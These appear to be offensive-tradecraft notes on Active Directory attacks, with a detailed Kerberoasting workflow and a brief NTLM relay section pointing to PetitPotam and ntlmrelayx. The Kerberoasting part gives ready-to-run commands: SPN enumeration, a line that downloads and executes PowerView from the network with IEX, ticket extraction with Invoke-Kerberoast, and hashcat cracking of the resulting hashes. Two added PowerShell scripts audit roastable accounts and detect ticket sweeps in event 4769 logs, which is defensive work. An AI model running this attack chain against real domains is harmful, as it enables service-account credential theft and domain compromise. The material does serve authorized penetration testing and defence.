Active Directory Offensive Tradecraft

TTPs for Active Directory attacks

Some notes

Kerberoasting

Kerberoasting abuses the Kerberos authentication protocol used by Active Directory: any authenticated domain user can request a service ticket for any account that has a Service Principal Name (SPN), and that ticket is encrypted with a key derived from the service account's password. The tickets can therefore be extracted and cracked offline to recover the plaintext passwords of the service accounts. Kerberoasting is often used to target high-privilege service accounts that are not subject to password rotation policies.

Workflow

01. Get SPNs

Using AD Powershell Module

# Get accounts with SPN
(Get-ADUser -Filter {servicePrincipalName -like '*'} -Properties servicePrincipalName).servicePrincipalName

Using setspn.exe

setspn.exe ships with Windows by default.

setspn.exe -T medin.local -Q */* | Select-String '^CN' -Context 0,1

Using AD Searcher

# We use .NET (System.DirectoryServices) here to connect to the domain via LDAP,
# so no RSAT / AD PowerShell module is required.
$ADBaseDir = (New-Object -TypeName System.DirectoryServices.DirectoryEntry -ArgumentList "LDAP://rootDSE").Get("defaultNamingContext")
# Objects that carry at least one SPN but are not computer accounts
$LDAPFilter = "(&(!(objectClass=computer))(servicePrincipalName=*))"
$DomainFQDN = "LDAP://$ADBaseDir"
$ADPropertiesToLoad = @("name", "samaccountname", "displayname", "serviceprincipalname")
$Domain = New-Object -TypeName System.DirectoryServices.DirectoryEntry -ArgumentList $DomainFQDN
$ADSearcher = New-Object System.DirectoryServices.DirectorySearcher
$ADSearcher.SearchRoot = $Domain
$ADSearcher.PageSize = 10
$ADSearcher.Filter = $LDAPFilter
$ADSearcher.SearchScope = "Subtree"
ForEach ($prop in $ADPropertiesToLoad) {[void]$ADSearcher.PropertiesToLoad.Add($prop)}
$Results = $ADSearcher.FindAll()
# Print each account with its SPNs
$Results | ForEach-Object { "$($_.Properties['samaccountname'][0]): $($_.Properties['serviceprincipalname'] -join ', ')" }

Using PowerView

# Launch shell as admin
# Load PowerSploit (host it on your own server, of course...)
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')
Get-DomainUser -SPN
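Defender's counterpart to the enumeration above, added here as an example (it is not from these notes nor from PowerView): the same DirectorySearcher query, extended to pull pwdLastSet, msDS-SupportedEncryptionTypes and adminCount so that roastable accounts can be ranked for password rotation, gMSA migration or AES-only enforcement. The attribute names and the encryption-type bitmask values are the real AD schema values; the function names, the one-year password-age threshold and the sample accounts at the bottom are assumptions.

```powershell
# Added example, not part of the original notes. Scores user accounts that
# carry an SPN so the ones most worth fixing surface first. Requires a
# domain-joined host for Get-SpnAccounts; Test-ServiceAccountRisk also runs
# on the constructed sample at the bottom.

function Test-ServiceAccountRisk {
    # Scores one account object; kept separate from the LDAP query so it can
    # be exercised on constructed data.
    param(
        [Parameter(Mandatory)] [pscustomobject] $Account,
        [int] $MaxPasswordAgeDays = 365   # assumed threshold
    )
    $flags = @()
    # msDS-SupportedEncryptionTypes bitmask: 4 = RC4-HMAC, 8 = AES128, 16 = AES256.
    # Unset/0 falls back to the domain default, which historically permits RC4.
    $enc = [int]$Account.SupportedEncTypes
    if ((-not $enc) -or (($enc -band 4) -ne 0)) { $flags += 'RC4-allowed' }
    if ($Account.PwdLastSet -eq [datetime]::MinValue) {
        $flags += 'password-age-unknown'
    } elseif (((Get-Date) - $Account.PwdLastSet).TotalDays -gt $MaxPasswordAgeDays) {
        $flags += 'stale-password'
    }
    # adminCount=1 marks current (or former) members of protected groups
    if ([int]$Account.AdminCount -eq 1) { $flags += 'protected-group' }
    [pscustomobject]@{
        SamAccountName = $Account.SamAccountName
        SpnCount       = @($Account.Spns).Count
        Flags          = ($flags -join ',')
        Score          = $flags.Count
    }
}

function Get-SpnAccounts {
    # Enabled user objects (not computers) carrying at least one SPN.
    $root = (New-Object System.DirectoryServices.DirectoryEntry 'LDAP://rootDSE').Get('defaultNamingContext')
    $searcher = New-Object System.DirectoryServices.DirectorySearcher
    $searcher.SearchRoot = New-Object System.DirectoryServices.DirectoryEntry "LDAP://$root"
    $searcher.Filter = '(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))'
    $searcher.PageSize = 1000
    foreach ($p in 'samaccountname','serviceprincipalname','pwdlastset','msds-supportedencryptiontypes','admincount') {
        [void]$searcher.PropertiesToLoad.Add($p)
    }
    foreach ($r in $searcher.FindAll()) {
        # pwdLastSet is a Windows FILETIME; 0 means "must change at next logon"
        $pls = [int64]($r.Properties['pwdlastset'] | Select-Object -First 1)
        $pwdDate = if ($pls -gt 0) { [datetime]::FromFileTime($pls) } else { [datetime]::MinValue }
        [pscustomobject]@{
            SamAccountName    = [string]$r.Properties['samaccountname'][0]
            Spns              = @($r.Properties['serviceprincipalname'])
            PwdLastSet        = $pwdDate
            SupportedEncTypes = [int]($r.Properties['msds-supportedencryptiontypes'] | Select-Object -First 1)
            AdminCount        = [int]($r.Properties['admincount'] | Select-Object -First 1)
        }
    }
}

# Constructed sample so the scoring can be seen without a domain:
$sample = @(
    [pscustomobject]@{ SamAccountName='svc_sql'; Spns=@('MSSQLSvc/sql01:1433'); PwdLastSet=(Get-Date).AddYears(-4); SupportedEncTypes=0;  AdminCount=1 }
    [pscustomobject]@{ SamAccountName='svc_web'; Spns=@('HTTP/web01','HTTP/web01.medin.local'); PwdLastSet=(Get-Date).AddDays(-20); SupportedEncTypes=24; AdminCount=0 }
)
$sample | ForEach-Object { Test-ServiceAccountRisk -Account $_ } | Sort-Object Score -Descending | Format-Table -AutoSize
# On a domain-joined host:
#   Get-SpnAccounts | ForEach-Object { Test-ServiceAccountRisk -Account $_ } | Sort-Object Score -Descending
```

In the sample, svc_sql scores 3 (RC4 allowed, four-year-old password, protected group) and svc_web scores 0 (AES-only, fresh password, not privileged); the same three attributes are what the roasting steps below rely on, so accounts at the top of this list are the ones to move to gMSA or rotate first.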

02. Request & Extract Roastable Kerberos Tickets

Using PowerView

# Launch shell as admin
# Load PowerSploit (host it on your own server, of course...)
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')
# -Encoding ASCII: Windows PowerShell's Out-File defaults to UTF-16, which hashcat does not parse
Invoke-Kerberoast -OutputFormat Hashcat | % {$_.Hash} | Out-File -Encoding ASCII 'C:\somewhere\spn_accounts_hashes.txt'

03. Crack Hashes with Hashcat

  • A Hashcat cheat sheet: https://github.com/frizb/Hashcat-Cheatsheet

# The mode must match the etype in the hash prefix:
# $krb5tgs$23$ -> 13100 (RC4), $krb5tgs$17$ -> 19600 (AES128), $krb5tgs$18$ -> 19700 (AES256)
.\hashcat.exe -m 19700 -a 0 -w 2 --force --opencl-device-types 1,2 -O 'C:\spn_accounts_hashes.txt' D:\wordlists\rockyou.txt -r .\rules\OneRuleToRuleThemAll.rule
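The ticket requests made in step 02 land on the domain controllers as Security event 4769 ("A Kerberos service ticket was requested"). The following PowerShell is an added example, not part of the original notes, of the detection logic a defender would run over those events: it flags accounts that pull RC4-HMAC (0x17) service tickets, the etype roasting tools prefer because it cracks far faster than AES, and accounts that request tickets for many distinct service accounts within a short window. Field names match the 4769 event XML; the window length, the threshold, the helper names and the sample events are constructed assumptions.

```powershell
# Added example, not part of the original notes. Runs over objects with the
# 4769 fields TimeCreated, TargetUserName (requesting account), ServiceName
# (service account the ticket was issued for), TicketEncryptionType and
# IpAddress. On a real host build the same objects from
#   Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4769}
# by reading those fields out of each event's XML.

function Find-KerberoastCandidates {
    param(
        [Parameter(Mandatory)] [object[]] $Events,
        [int] $WindowMinutes = 5,   # assumed: sliding window length
        [int] $SpnThreshold  = 5    # assumed: distinct services per window that looks like a sweep
    )
    $findings = @()
    foreach ($group in ($Events | Group-Object TargetUserName)) {
        $requests = @($group.Group | Sort-Object TimeCreated)
        $rc4Count = @($requests | Where-Object { $_.TicketEncryptionType -eq '0x17' }).Count
        # Largest number of distinct service accounts seen in any window
        $maxDistinct = 0
        foreach ($start in $requests) {
            $end = $start.TimeCreated.AddMinutes($WindowMinutes)
            $inWindow = @($requests | Where-Object { $_.TimeCreated -ge $start.TimeCreated -and $_.TimeCreated -le $end })
            $distinct = @($inWindow | ForEach-Object { $_.ServiceName } | Sort-Object -Unique).Count
            if ($distinct -gt $maxDistinct) { $maxDistinct = $distinct }
        }
        if ($rc4Count -eq 0 -and $maxDistinct -lt $SpnThreshold) { continue }
        # RC4 alone is noisy where RC4 is still the domain default; both signals together is the strong case
        $verdict = if ($rc4Count -gt 0 -and $maxDistinct -ge $SpnThreshold) { 'likely-kerberoast' } else { 'review' }
        $findings += [pscustomobject]@{
            User            = $group.Name
            Requests        = $requests.Count
            Rc4Requests     = $rc4Count
            MaxDistinctSpns = $maxDistinct
            SourceIps       = (@($requests | ForEach-Object { $_.IpAddress } | Sort-Object -Unique) -join ',')
            Verdict         = $verdict
        }
    }
    return $findings
}

# Constructed sample events (hypothetical helper, not a real cmdlet)
function New-Ticket4769 ($Time, $User, $Service, $Etype, $Ip) {
    [pscustomobject]@{ TimeCreated=$Time; TargetUserName=$User; ServiceName=$Service; TicketEncryptionType=$Etype; IpAddress=$Ip }
}
$t0 = Get-Date '2024-01-01 09:00:00'
$SampleEvents = @(
    # normal: alice opens a file share and a web app with AES256 tickets over the morning
    New-Ticket4769 $t0.AddMinutes(2)  'alice@MEDIN.LOCAL' 'fs01$'   '0x12' '10.0.0.21'
    New-Ticket4769 $t0.AddMinutes(40) 'alice@MEDIN.LOCAL' 'svc_web' '0x12' '10.0.0.21'
)
# sweep: bob pulls RC4 tickets for every SPN account within one minute
$spnAccounts = 'svc_sql','svc_web','svc_backup','svc_report','svc_ldap','svc_print'
for ($i = 0; $i -lt $spnAccounts.Count; $i++) {
    $SampleEvents += New-Ticket4769 $t0.AddSeconds(60 + 8*$i) 'bob@MEDIN.LOCAL' $spnAccounts[$i] '0x17' '10.0.0.77'
}
Find-KerberoastCandidates -Events $SampleEvents | Format-Table -AutoSize
```

On the sample, alice is never reported (two AES tickets, one service per window) while bob is reported as likely-kerberoast with 6 RC4 requests and 6 distinct services from 10.0.0.77. Enforcing AES-only on service accounts removes the first signal entirely, which is why the audit in step 01 flags RC4-allowed accounts.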

References

NTLM Relay

Using PetitPotam

The tool can be obtained here: https://github.com/topotam/PetitPotam/blob/main/Petitpotam.py (note: requires Impacket to be installed).

References

  • Good practical guide: https://www.exandroid.dev/2021/06/23/ad-cs-relay-attack-practical-guide/ that shows how to run ntlmrelayx.py and set your Certificate Authority (CA) as a target.
  • Guide using PayloadsAllTheThings: https://gitlab.com/pentest-tools/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#ad-cs-relay-attack
  • Performing a similar attack with RemotePotato: https://github.com/antonioCoco/RemotePotato0
  • Takeover via RBCD (Resource Based Constrained Delegation): https://gist.github.com/audibleblink/06916db2a76c7bd13400c4f9da422ad5
  • Mitigations:
    • https://threatpost.com/microsoft-petitpotam-poc/168163/